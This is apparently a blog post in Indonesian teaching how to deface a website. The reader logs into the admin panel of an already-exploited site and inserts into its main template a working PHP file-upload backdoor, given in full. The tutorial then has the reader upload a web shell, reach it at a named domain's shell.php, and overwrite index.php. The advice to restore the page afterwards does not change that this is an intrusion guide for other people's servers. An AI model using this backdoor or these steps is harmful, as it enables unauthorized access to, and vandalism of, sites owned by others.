Saya ingatkan kepada Anda yang ingin belajar menebas Index.php dengan menanam shell, alangkah baiknya jika Anda akan mengganti script index dengan script deface Anda, Copy terlebih dahulu Script index pada web tersebut ke Notepad dan simpan. silahkan ganti script index dengan script deface Anda. Jika sudah berhasil, Saya sarankan untuk mengembalikan web seperti semula, dan script deface Anda Silahkan Ganti lagi dengan Script index.php website tersebut.
Sebelum memulai, Anda harus mempunyai shell untuk di Upload
Login ke Administrator Website yang sudah Anda Exploit.
Masuk Ke Menu Template
Lihat Template Site yang sekarang menjadi Default ( Ada tanda bintangnya ). Kenudian Klik "Templates"
Klik Template Site yang menjadi Default
Pilih "Edit main page template"
Tambahkan Script Berikut diatas atau dibawah (terserah Anda) script template, Kemudian Save.
<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Sukses!!!<b><br><br>'; }
else { echo '<b>Gagal Upload!!!</b><br><br>'; }
}
?>
Setelah Anda save, silahkan buka website tersebut, maka ada tampilan untuk mengupload file. Dan upload shell Anda.
Jika sudah, Tambahkan Nama Shell Anda pada URL Webnya. Misal: http://leansolutions.com.mx/shell.php. Selanjutnya Cari file index.php nya dan edit.
kunjungi balik www.penulisid.com
BalasHapusTerima kasih atas kunjungannya
Hapus